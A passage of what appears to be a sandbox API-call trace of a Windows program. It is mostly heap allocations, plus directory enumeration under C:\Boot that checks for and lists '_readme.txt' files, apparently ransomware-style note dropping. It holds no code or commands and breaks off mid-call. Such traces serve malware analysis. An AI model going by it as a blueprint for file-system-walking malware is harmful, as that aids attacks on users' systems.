[0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.465] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.465] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.466] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.466] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.467] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.467] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.467] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.467] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.467] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.467] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0146.467] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.467] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.467] PathFindFileNameW (pszPath="") returned="" [0146.467] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.467] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.467] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.467] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.467] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.468] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0146.468] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.468] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.468] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0146.468] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.468] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.468] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.468] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.468] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.468] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.468] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.468] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.468] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.468] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.468] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.468] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.469] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.469] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.469] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.470] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.470] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.471] HeapFree (in: 